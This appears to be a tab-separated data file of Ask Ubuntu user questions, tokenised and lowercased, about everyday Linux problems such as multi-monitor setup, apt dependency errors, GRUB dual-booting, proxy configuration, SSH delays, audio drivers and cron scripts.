474293	touch screen and two monitors	i 'm using xubuntu 12.04.4 . i have two monitors ( one touchscreen and one regular ) . i 've used xrandr to set regular screen right of touch screen , so extended display . now ubuntu thinks the entire extended desktop is touch . how can i solve this problem ? best regards , kovi
474297	tzdata-java / tzdata package update error ubuntu precise 12.04	i had an unexpected error while updating the tzdata-java package ( through daily updates ) . the following packages have unmet dependencies : tzdata-java : depends : tzdata ( = 2014c-0ubuntu0.12.04 ) but 2014a-0ubuntu0.12.04 is to be installed i tried to run apt-get install -f to solve the problem but i got this error message . preparing to replace tzdata 2014a-0ubuntu0.12.04 ( using ... /tzdata_2014c-0ubuntu0.12.04_all.deb ) ... unpacking replacement tzdata ... dpkg : error processing /var/cache/apt/archives/tzdata_2014c-0ubuntu0.12.04_all.deb ( -- unpack ) : unable to stat `./usr/share/zoneinfo/right/europe/bratislava ' ( which i was about to install ) : input/output error since then i ca n't install anything . i 've tried re-installing tzdata manually with sudo apt-get install -f -- reinstall tzdata and even dpkg -i tzdata_2014c-0ubuntu0.12.04_all.deb but that does n't work , i get the same error message in the end unable to stat `./usr/share/zoneinfo/right/europe/bratislava ' ( which i was about to install ) : input/output error any tips appreciated . nb : i read how do i resolve unmet dependencies ? so i checked ppas . i had only one ppa http : //ppa.launchpad.net/webupd8team/unstable/ubuntu but i ca n't find the corresponding package ( might have to do with dropbox ) . not sure it has anything to do with the problem though .
474298	multiple ips on different subnets on one interface	i have managed to configure two ips from different subnets on the same card . i changed /etc/network/interfaces to have : auto eth0 iface eth0 inet static address 172.16.4.254 netmask 255.255.255.0 network 172.16.4.0 broadcast 172.16.4.255 gateway 172.16.4.1 dns-nameservers 172.16.4.1 iface eth0 inet static address 192.168.1.10 netmask 255.255.255.0 the problem is that the connections over the first ip started being laggy ( the response time increased greatly ) . for instance it takes a lot of time to start loading a webpage , but it does eventually succeed . i need a console/configuration solution . no gui .
474300	windows 8.1 keeps changing my boot order in favor of windows	i installed ubuntu 14.04 lts on a partition of an external disk drive connected to my hp 400-224 pc . the ubuntu boot partition is sdb . efi mode is enabled for both ubuntu and windows 8.1 . secure boot is enabled ; fast boot is disabled ; legacy boot is disabled . when i boot ubuntu and restart within ubuntu , grub-efi lets me choose whether i want ubuntu or windows . however , if i go back to windows and restart , windows always changes my boot order , placing ubuntu last in the list . i always have to manually modify my uefi settings and place ubuntu ahead of windows if i want to go back to ubuntu . this seems like too much work . is there any way to keep windows from doing this ?
474304	no grub menu bootloader option	i have used ubuntu distribution in my hp laptop along with windows 7 dual-boot before . but due to some mistakes while partitioning using windows default partition tool , i formatted my system drives and as a result i had no other choice than to reinstall everything . i first installed windows 7 and then installed ubuntu on different partition drives . after i installed ubuntu 14.04 and restarted the system , there was no bootloader menu option . windows 7 was directly accessed without grub menu . i tried the boot-repair tool too but after i installed it there was no recommended repair option neither the advanced settings option . there was only create a bootinfo summary . here is the url for my bootinfo summary [ http : //paste.ubuntu.com/7548609/ ] .
474306	can i configure ubuntu or firefox to use a socks proxy for a specific wifi network ?	i occasionally connect to an unsecure wifi network for which i would like to use a socks proxy - but only on that network . can i configure things so that ubuntu and/or firefox will choose to use the proxy only when on that specific wifi network ?
474308	smart card token not recognized	i use omnikey smart card reader and akis smart card.i installed drivers , pkcs11 , pkcs15 , opensc , libusb , pcsclite etc . - when i run akis smart card viewer program , still gives error error : exitsun.security.pkcs11.wrapper.pkcs11exception : ckr_token_not_recognized and error : severe : fail card= null how can i do ?
474310	account password not working after installation	i get ubuntu 14.04 and installed on my laptop.i chose a password and put automatic log in . everything was right , but when i tried to put my password it does n't match ( i am sure because password matches together when i put before installing ) .i tried changing in recovery mode , i had root access , put password and i thought it was allright . i tried but again it does n't match . that 's embarrasing , help me .
474312	how to edit files in a terminal with vim ?	it is not always possible to edit and create files in a terminal , and i would like to get answers of the basics of manipulating files in a terminal using vim under ubuntu linux . specific questions i have are : how can i open text files for editing ? how can i save the file ? how can i save the file with a different name ? how can i leave the file without saving the changes ? what settings are best in my configuration file and where is this file ? how do i set the colors for vim ? how do i show line numbers in vim and can this be toggled ? a lot of questions here but i believe these questions and their answers should cover basic vim usage .
474314	how to fix bluetooth driver ?	i have hp probook 4540s the problem is that bluetooth does n't work and i do n't know how to fix it ? i tried the drivers on hp website but it did n't fix the problem .
474315	how to stop ubuntu from auto mounting my phone ?	i am using usb cable to charge my phone , however , ubuntu auto mount my phone and show the files in it . how could i stop this ?
474317	get a list of packages on a fresh install	i want a list of all packages installed , along with versions ( if possible ) on a clean install of ubuntu ( any version ) . i can use dpkg -l | grep '^ii ' | awk ' { print $ 2 '' `` $ 3 } ' on a fresh installation , but that 's not a good idea , as when a new version of ubuntu is available , it has to be re run . rather than relying on scripts , i prefer having a file , which lists all the packages that are installed on all systems
474322	dual-monitor with nvidia gtx 660 not detecting second monitor	i 've been trying this dual-monitor set-up for the last 2 weeks but with no success . i 've readed tones of forums and tutorials but nothing seems to work . i 'm trying to get both screens through the 2 dvi 's gpu connectors being displayed with xrandr -q as dvi-i-1 ( connected ) and dvi-d-0 ( disconnected ) . in theory by typing sudo nvidia-settings on the terminal i should be able to see and configure twinview and save the config on to the /etc/x11/xorg.conf but nvidia does n't seems to detect the screen . i 've tried with many different drivers from the additional drivers utility in ubuntu and also manually installed from the nvidia site but in they were not able to detect the second monitor . lastly the closest i 've got to get it working was with the following xorg.conf configuration : section `` serverlayout '' identifier `` twinlayout '' screen 0 `` metascreen '' 0 0 endsection section `` monitor '' identifier `` monitor0 '' option `` enable '' `` true '' endsection section `` monitor '' identifier `` monitor1 '' option `` enable '' `` true '' endsection section `` device '' identifier `` card0 '' driver `` nvidia '' vendorname `` nvidia corporation '' # refer to the link below for more information on each of the following options . option `` horizsync '' `` dfp-0 : 28-33 ; dfp-3 28-33 '' option `` vertrefresh '' `` dfp-0 : 43-73 ; dfp-3 43-73 '' option `` metamodes '' `` 1920x1080 , 1920x1080 '' option `` connectedmonitor '' `` dfp-0 , dfp-3 '' option `` metamodeorientation '' `` dfp-3 leftof dfp-0 '' endsection section `` screen '' identifier `` metascreen '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` true '' subsection `` display '' modes `` 1920x1080 '' endsubsection endsection in this case , the second monitor is working but with limited resolution 800x600 and from here also tried many different configurations but non of them allow me to modify the second screen resolution . it doe n't feel right anyway to force it like that , as far as i understood the nvidia-settings should detect the second screen just by pluging it . my conclusion is that the driver does n't handle properly a secondary monitor that 's why i would like to know if some have successfully achieve this with similar hardware or if someone could give me any clue about how to make this to work . thanks in advance
474328	importerror : no module named md5	i followed this tutorial to install python-3.1.3 on ubuntu . on the terminal , i run : python3.1.3 , then import md5 i get this error : importerror : no module named md5 same problem when i run : import hashlib how can i fix this problem ? p.s . this solution does not work for me . i installed all these libraries before python3.1.3 installation : zlib1g-dev libncurses5-dev libssl-dev libbz2-dev libsqlite3-dev tk-dev libgdbm-dev
474330	no grub selection after installing kernel ubuntu 14.04	i have installed a new kernel on my system which can be found by grub but when i restart i can only select the old kernel . things i tried in other threds with similar problems did n't help . sudo update-grub gives generating grub configuration file ... found linux image : /boot/vmlinuz-3.15.0-031500rc2-lowlatency found initrd image : /boot/initrd.img-3.15.0-031500rc2-lowlatency found linux image : /boot/vmlinuz-3.15.0-031500rc2-generic found initrd image : /boot/initrd.img-3.15.0-031500rc2-generic found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin done however , afer a reboot i can only choose the 3.13 kernel . any ideas what happened ? i i have a full encrypted hard drive so maybe i have overseen something while installing the new kernel to get this work ? the grub config file is grub_default=0 grub_hidden_timeout_quiet=false grub_timeout=5 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' '' grub_enable_cryptodisk=1 any ideas ? thanks .
474332	problems establishing ssh connection	since two days i am facing a really weird problem . i have receantly installed ubuntu server 14.04 lts on a workstation . it has a fix ip address , which i can successfully ping from other computers in the network . but when i try to establish a ssh connection from a windows computer via putty i get some strange errors , which i can not fix . the problem is that putty takes a really long time trying to establish a connection . after about 10 seconds i get the following error : network error : software caused connection abort but when i click the restart session option a several times after putty shows the error message , i can login in . but now comes the other problem . when the login appears on the putty console i type in the user , but it really takes a long time until i can type in the password to login . this is what i already tried : sshd : all in etc/hosts.allow commented line session optional pam_motd.so in etc/pam.d/login and etc/pam.d/sshd configured the firewall with : sudo iptables -a input -p tcp -- dport ssh -j accept checked if ssh server is listening on port 22 usedns no in etc/ssh/sshd_config i hope someone can help me , because this problem is really annoying . thanks in regard
474335	getting exfat support in ubuntu 14.04 ?	i looked at all the other questions but none seemed to work so here it goes . i have a microsdxc card that 's in an adapter that 's in my computer and i cant access it because there is no exfat support so when i do sudo apt-get install exfat-fuse exfat-utils this comes out in the terminal reading package lists ... done building dependency tree reading state information ... done e : unable to locate package exfat-fuse i have tried updating my repo 's and the update manager and i have tried adding the ppa . nothing seems to work . any ideas ?
474337	microphone input volume is too low , 14.04	microphone input volume is too low , so that the other part , while on video call , can hardly hear me !
474339	systray not showing	i have an application called foo that runs as root . the foo calls system function to execute the other application which show tray icon using qt . the systray icon example in qt is working properly in user account but not in root . i run the following command to drop privileges : system ( “exec su -l user -c ‘export display=:0 ; /opt/systray & ’” ) ; however , the systray icon doesn’t appear in ubuntu 13.10 & 14.04 . is there any way to display this systray in this case except for the solution that uses a ppa that comes with to re-enable the systray whitelist ?
474340	lost volume control osd for ubuntu	i 've been happily chugging along with ubuntu 14.04 ( love it ) , and something i must have done removed the on screen notification when i change the volume via keyboard buttons . when i change the volume via the keyboard , it works , i can hear the alert telling me i 've done it , and the small volume indicator in the panel does show the change , but i used to see a pop up rounded rectangle in the top right of the screen that showed me clearer feedback when i changed volume via the keyboard . it 's now gone . can anyone offer any help in bringing it back ?
474344	how to find symbolic link for a specific file	i want to know how to find if a certain file has a symbolic link to another file ? the ln command # ln -s /etc/kannel.conf /etc/kannel/kannel.conf how to confirm this symbolic link ?
474345	how can i install ubuntu alongside fedora ?	i am currently running fedora and would like to dual boot fedora with ubuntu . i do not want to replace fedora , i would like to keep it as my main os . however , when using the ubuntu installer i only get the options to either : `` replace fedora release 20 ( heisenbug ) with ubuntu '' or `` something else '' . is there a way i can install ubuntu alongside fedora without deleting it ? if so , as i would like fedora to be my main os , is there also a way to make it the top grub option ? i have tried partitioning with gparted , however i ca n't split the fedora partition . it says it is all used , however i have only used about 100gb/500gb . i am trying to install ubuntu 13.10 using a live usb stick . i will upgrade to ubuntu 14.04 when i install it , but do n't want to make a new ubuntu live usb . fdisk -l : device boot start end blocks id system /dev/sda1 * 2048 1026047 512000 83 linux /dev/sda2 1026048 976773119 487873536 8e linux lvm disk /dev/mapper/fedora-swap : 3.8 gib , 4043309056 bytes , 7897088 sectors units : sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk /dev/mapper/fedora-root : 50 gib , 53687091200 bytes , 104857600 sectors units : sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk /dev/mapper/fedora-home : 411.5 gib , 441848954880 bytes , 862986240 sectors units : sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes parted -l : model : ata toshiba mq01abf0 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos disk flags : number start end size type file system flags 1 1049kb 525mb 524mb primary ext4 boot 2 525mb 500gb 500gb primary lvm model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/fedora-home : 442gb sector size ( logical/physical ) : 512b/4096b partition table : loop disk flags : number start end size file system flags 1 0.00b 442gb 442gb ext4 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/fedora-root : 53.7gb sector size ( logical/physical ) : 512b/4096b partition table : loop disk flags : number start end size file system flags 1 0.00b 53.7gb 53.7gb ext4 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/fedora-swap : 4043mb sector size ( logical/physical ) : 512b/4096b partition table : loop disk flags : number start end size file system flags 1 0.00b 4043mb 4043mb linux-swap ( v1 )
474346	installation 14.04 - machine does not restart - stopping early crypto disks ok	this is my first time to install ubuntu version is 14.04 desktop . after installation on a virtual machine ( hyper v ) , it says to restart . it will stop at : stopping early crypto disks ok then it will stop here and it seems i have to shutdown the virtual machine to restart ubuntu . i am not sure if my installation is complete or not . thanks for any help .
474350	high cpu load - ubuntu 14.04	i noticed that sometimes when browsing ( with other processes in the background ) , i get very high cpu load for the browser process ( over 100 % ) and the computer becomes really slow . i tried switching from firefox ( with just a few extensions ) to chromium , but same thing happens without me visiting graphics-intense sites , flash sites or anything like that . i also noticed python or node ( when running `` make '' ) produce the same high cpu load from time to time so this is not necessarily browser-related . when i only have a browser open , it does n't seem to happen and everything is fine in windows 7 . i switched from unity to gnome3 with no effect . specs : lenovo w510 ( 4gb ram , i7 q820 @ 1.73 ) + up to date ubuntu 14.04 64bit . printscreen : http : //imgur.com/8mzjnkc do you guys have any idea why this might happen ? please let me know if there 's other info you need . thanks !
474352	system logs me off after i close laptop 's screen	hello everybody i have very anoying issue with my ubuntu 14.04 . when i close the screen of my laptop , the system logs me off and i need to enter my password to log in again . that would not be a problem , but i use my laptop as router for my xb360 console , so laptop has to be loged in all the time to allow me connect with xbox live . i have already switch the option of freezing the computer after closing the screen , but it still log me off and it disconnects me with xbox live .
474354	use system wide proxy in ubuntu 14 lts 64 bit	i want to use a system wide proxy and did the following : created a file apt.conf in etc/apt/ with acquire : :http : :proxy `` http : //user : pass @ proxy.pac:8012/ '' ; ( i had to set chmod to 777 to edit it ) i put the same line in etc/environment . i put the proxy in network administration . it still does n't work . the proxy works fine when i put it in firefox . any other ideas ? nothing from these answers worked for me : proxy settings not working thanks update : if i run the command set | grep -i proxy i get the following : http_proxy=http : //http : //my_user_pass @ proxy:8012/ no_proxy=localhost,127.0.0.0/8 , ::1 -p -- http-proxy -- no-http-proxy\
474355	create personal wireless network on laptop	i have a wifi network , now i have connected my laptop to the wifi network . and it is working fine i 'm able to access the internet via wifi . but i want to create other network on my laptop so that i can connect my mobile phone to the my laptop network . means , my laptop is already connected to wifi network ( xyz ) . now i want to create one wireless network on my laptop . so that i can connect my mobile phone to laptop network and access the internet on mobile . but i do n't want to lost my `laptop and wifi connection that is already connected . i tried to create the wireless network on my laptop , but when i created my personal wireless network i lost my wifi-laptop connection . i do n't know it is possible or not .
474359	1152ă864 screen display resolution	help , i need to change my screen to 1152x864 . it is stuck 1024x768 . i have a graphics card which is unknown to ubuntu so i have to change the screen manually . i 'm using xrandr and i got help getting my screen to 2048 but it wo n't work on my monitor.this is what i done and it worked . can anyone help change this ? see below of what i had followed . what do i need to change ? it is probable that your graphic driver is not detecting that resolution . follow the instructions below ; it might help ( it helped me in ubuntu with unity ) . first type this in your terminal ( you can open terminal with ctrl+alt+t ) : - cvt 2048 1536 you will get something like this : - 2048x1536 59.95 hz ( cvt 3.15m3 ) hsync : 95.45 khz ; pclk : 267.25 mhz modeline `` 2048x1536_60.00 '' 267.25 2048 2208 2424 2800 1536 1539 1543 1592 -hsync +vsync now do this : - xrandr -- newmode `` 2048x1536_60.00 '' 267.25 2048 2208 2424 2800 1536 1539 1543 1592 -hsync +vsync
474366	problem wih 'audio ' - not recognizing the built-in-speaker in my laptop	ubuntu 14.04 trusty the system is not recognizing the built-in-speaker in my laptop . when it comes to headphones and earphones it 's working . but when i unplug it , it 's not working . the output of gksudo gedit /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 the output of cat /proc/asound/card0/codec # * | grep codec codec : analog devices ad1986a
474372	maas - listed nodes not booting	after having used ubuntu for 4 years , i started playing around with ubuntu for servers , maas , that kind of stuff and come to the conclusion that i totally suck at it . i need help ! i have been installing , reinstalling maas on an old pc of mine and i get the whole thing so far that i can login to the system on $ http : //xx.xx.xx.15/maas . however from there it goes wrong ... partly i guess because i don know what i´m doing . it starts with dns & dhcp management : i have a network in my house with a cisco router which has the option switched on for dhcp server . does this mean , i should not interfere with the router ? or shall i switch it off and build my own thing ? at the moment , i let maas still do the dns & dhcp managment . after that : adding nodes in de ui seems easy to do . i can even find and list them in command line . however when , i want to do $ maas maas nodes accept-all , it gives me ´ [ ] ´ and for the rest the node does not perform anything . the documentation for maas ( http : //maas.ubuntu.com/docs/index.html ) was probably meant for smarter people , at least i don´t get what i´m doing wrong . i guess what i am missing is a step-by-step tutorial that explains every single box that i have to fill in . apparently , i don fill them in correctly . would be very thankful for help . greets , aqua
474374	graphic card definition	how to download and install graphic card definitions , geforce cuda thants : ) . iam new to linux and i don'r know how to deal with compressed files . i 've downloaded a cuda definitions but i did n't know what to do next .
474375	battlefield play 4 free in ubuntu 14.04	how do i install battlefield play 4 free in ubuntu ? i saw a youtube video , but i ca n't do the same as the guy in the video . anyone can help me ?
474379	dispatcher.d script not executing	i 'm currently working on script , which will change proxy and apt settings depending on network in which the laptop will be plugged in . problem is that , if i run the script from terminal , everything works fine . but as soon as i place it in the /etc/networkmanager/dispatcher.d/ , according to syslog , nothing happens . permissions : -rwxr-xr-x 1 root root 1163 mรกj 30 12:23 02ifupproxy* this is the script : # ! /bin/bash # script for proxy auto detection . aptconf= '' /etc/apt/apt.conf '' aptconfd= '' /etc/apt/apt.conf.d/01proxy '' adapter=`ps -ef | grep eth| grep root | awk ' { print $ 18 } '` ipaddres=`ifconfig $ adapter | grep inet\ addr | awk -f `` : '' ' { print $ 2 } ' | awk ' { print $ 1 } '` ipaddra=`echo $ ipaddres | awk -f `` . '' ' { print $ 1 } '` ipaddrb=`echo $ ipaddres | awk -f `` . '' ' { print $ 2 } '` ipaddrc=`echo $ ipaddres | awk -f `` . '' ' { print $ 3 } '` if [ $ ipaddra -eq 192 ] & & [ $ ipaddrb -eq 168 ] & & [ $ ipaddrc -ge 129 ] & & [ $ ipaddrc -le 140 ] ; then ping -c 3 192.168.143.57 if [ $ ? -eq 0 ] ; then if [ -f $ aptconfd ] ; then echo `` acquire : :http : :proxy \ '' http : //192.168.143.57:3142\ '' ; '' > $ aptconfd notify-send -i /usr/share/icons/gnome/32x32/status/network-receive.png settings\ changed\ for\ gratex\ proxy gsettings set org.gnome.system.proxy mode 'manual' fi fi else notify-send -i /usr/share/icons/gnome/48x48/status/network-error.png settings\ changed\ for\ outside gsettings set org.gnome.system.proxy mode 'none' echo `` '' > $ aptconfd fi
474382	ubuntu not starting - urgent help required	after i run this command sudo apt-get remove libpam-smbpass ubuntu does n't start . i see the ubuntu logo with dots below and then a blank screen after that . if i close lid and open again i see button labeled with [ ok ] and nothing happens . please help .
474383	extremely poor performance after graphics card upgrade	i have an amd a10-5800k apu that i was using for graphics because it has integrated graphics . knowing that i ca n't use amd dual graphics on linux , i got a dedicated card anyway because i can use dual graphics in windows . even though windows is better for gaming now , ubuntu is not only slow now , it 's become terribly unstable . even the keyboard is acting odd . information that may help : the grub bootloader is now in a low resolution like 800x600 or 640x480 , not sure which , whereas it used to be in 1080p like the desktop . the ubuntu splash screen is gone so after grub the only visual that comes is the login screen . after logging in , the background becomes completely jumbled before the launcher loads , after which it stabilizes . very noticeable keyboard input delay now as well . is this a bug or can i fix it ?
474384	manually adding a wireless network	hi i installed ubuntu 14 and it connects well to wireless network though i tried connecting manually to my schools network by opening wifi networks then the add button and followed the instructions offered by the network administrators . but after filling all the required fields the save button is never activating so , what could be the problem .
474386	cut a file in lubuntu	when copy , cutting and pasting a file . in other os there is a visual feedback when you cut a file . is it possible to customize that in filemanager pcmanfm . or is there another file manager that you would recommend that has that feature .
474387	installing a directory with a debian package	i want to create a debian package that installs a bunch of folders to a system but i ca n't get it working . the package gets created without any errors and lintian also says it 's okay but installing does nothing . the rules file looks like this : < # > ! /usr/bin/make -f logs = $ ( curdir ) /shell_logs/ dest1 = /opt/pacetutor/ build : build-stamp build-stamp : dh_testdir touch build-stam clean : dh_testdir dh_testroot rm -f build-stamp dh_clean install : build clean $ ( logs ) dh_testdir dh_testroot dh_prep dh_installdirs mkdir -m 755 -p $ ( dest1 ) < - this is propably optional or not needed - > cp -r $ ( logs ) $ ( dest1 ) < - using mv works but thats not what i want . - > binary-indep : build install dh_testdir dh_testroot dh_installchangelogs dh_installdocs dh_installexamples dh_installman dh_link dh_compress dh_fixperms dh_installdeb dh_gencontrol dh_md5sums dh_builddeb binary-arch : build install binary : binary-indep binary-arch .phony : build clean binary-indep binary-arch binary install
474388	php5 , mysql , phpmyadmin not working in ubuntu14.04	i have already installed lampserver in ubuntu 14.04. when i try to run http : //'127.0.0.1 ' , it shows it works . but it does not work when i try to run http : //'127.0.0.1'/test.php . i have already created the test.php file in var/www/ . i cannnot figure out what is wrong with it . i have already installed php5 and mysql but it does not work .
474390	red icon on the top right corner of screen	i am running ubuntu 12.04 . suddenly a red icon has appeared on the top right corner of my screen . it says '' an error occurred , please run package manager from the right click menu or apt-get in a terminal to see what is wrong . the error message was : 'error opening the cache ( e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/archive/canonical.com_dists_precise_partner_binary-i-386_packages , e : the package list or status file could not be parsed or opened . ' ) . this usually means that you installed packages have unmet dependencies . '' i tried sudo rm /var/lib/apt/lists/* -vf sudo apt-get autoclean sudo apt-get update sudo apt-get upgrade etc . after looking at similar issues in various forums , but still not able to fix the issue . please suggest something .
474394	how to enumerate available lte networks and their signal strength ? a tool or at command	i have a 4g usb modem huawei e3276 and want to get a sim card of a provider with best reception . but my tool mobile partner only shows the level of the home network .
474395	boot windows 8 after migration from hdd to ssd	i migrated my hdd windows 8 to a sdd partition . also i have ubuntu and linux mint in the same sdd . grub is working fine for ubuntu and mint , but it does n't detect the windows 8 partition . i used the boot-repair utility in order to fix it and here is the summary : http : //paste2.org/8yc4kchs as you can see , in /dev/sda6 it is the win8 but there is an issue about the starting sector and the size ( because i moved it from hdd to ssd ) . anyone knows how to fix it ? is this the reason why grub does n't put the win8 option in the menu ? thaks you ! ! sebastiรกn
474396	can i dualboot iphone/ipod touch with ubuntu ?	i just recently dualbooted my macbook 3,1 with lubuntu , since it was getting slow . can i do the same with my ipod touch 4th generation ?
474398	vmware and 3d acceleration	i installed ubuntu 14.04 and then vmware 10.0.2 with windows 7 as guest . i get no 3d acceleration error when starting the guest machine . i have installed opengl and all mesa lib files . below is a display of my installation : firmtechnologies @ firmtechnologies : ~ $ glxinfo | grep rendering direct rendering : yes firmtechnologies @ firmtechnologies : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 3.0 mesa 10.1.3 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes firmtechnologies @ firmtechnologies : ~ $ mks.gl.allowblacklisteddrivers = `` true '' added to .vmx file but , i still get an error when trying to use the windows aero theme and other graphics display like running youcam . what do i do ?
474399	running shellscript with cronjob is making problems , executing manually not . ideas ?	i made a shell script called /home/root/cron_grads.sh ( chmodded 755 ) on my server . in this directory are more grads-scripts like 500hpa_p0.gs ( 644 ) . my main script creates a temporary file grads_exec.gs , fills it with some content and then tries to copy the content of 500hpa_p0.gs onto the end of it before executing the whole thing this works fine , even on the server if i start it manually . but using crontab -e with : 42 0,6,12,18 * * * /home/root/grads/cron_grads.sh ... an error occurs . the script starts but grads says : cat : 500hpa_p0.gs : file or directory not found i am using bash in cron_grads.sh with # ! /bin/bash at the top in it . crontab -e also contains shell=/bin/bash . any ideas ?
474402	best setup for lamp stack development	i currently have ubuntu 14.04 with lamp stack running in virtualbox under win 8.1 . i use phpstorm inside the virtualbox . virtualbox is running fine except for some flickering and screen refresh issues sometimes . i think maybe to run phpstorm under windows and share my home/project folder with samba . i would do svn/git commits from windows as well is it safe from any side effects like wrong file encoding or file rights ?
474406	14.04 can not remove lenses	i want to remove photo , video and music lenses from the dash , in 12.04 was enough to purge the unity-lens-whatever but in 14.04 this trick does n't do the job , neither remove the scopes . ideas ? found a solution , using dconf i edited com/canonical/unity/dash and removed the unwanted entries . will this method cause any issues or conflicts in the future ?
474412	ubuntu only shows music files on andrioid device	i am having trouble browsing my documents on my android device through my ubuntu 12.04 laptop . it 's a samsung galaxy mega and my laptop is a lenovo z580 . i am able to connect and browse my phone but it only shows music or video files . however on windows they show up and i 'm able to browse and view them . and yes it 's android 4.2.2 and uses mtp for transferring files . is there any way i can view these files ? ( i do n't want to use ftp if possible ) cheers , sid
474414	tvtime - no sound on channel change	since i 've upgraded xubuntu 12.04 to 14.04 , the tv-sound output does not work after switching to another channel within tvtime . the tv card is a hauppauge wintv hvr-900 ( analog input ) . the first channel works fine with that known workaround : # /bin/bash tvtime -- device=/dev/video1 & sleep 4 arecord -v -d hw:1,0 -c 2 -r 48000 -f s16_le -- buffer-size=2000 | aplay -- buffer-size 1500 & when changing the channel , the sound stops . a switch back to the origin channel does n't help . dmesg shows the following two lines : [ 63785.342744 ] capture write error ( dma or irq trouble ? ) [ 63795.443632 ] capture write error ( dma or irq trouble ? ) after restarting tvtime the sound is working again . during a start of tvtime , the following lines are logged ( dmesg ) : [ 63907.299941 ] xc2028 9-0061 : i2c input error : rc = -19 ( should be 2 ) [ 63907.300427 ] xc2028 9-0061 : i2c input error : rc = -19 ( should be 2 ) [ 63907.358566 ] xc2028 9-0061 : loading firmware for type = base mts f8mhz ( 7 ) , id 0,000,000,000,000,000th [ 63908.517251 ] mts ( 4 ) , id 00000000000000ff : [ 63908.517260 ] xc2028 9-0061 : loading firmware for type = mts ( 4 ) , id 0,000,000,100,000,007th version : tvtime version 1.0.2 xubuntu 12.04 : aplay / arecord 1.0.25 xubuntu 14.04 : aplay / arecord 1.0.27.2 tv card : hauppauge wintv hvr-900 ( m/r 65018 ) , id 2040:6502 does anyone have an idea how to solve this issue ?
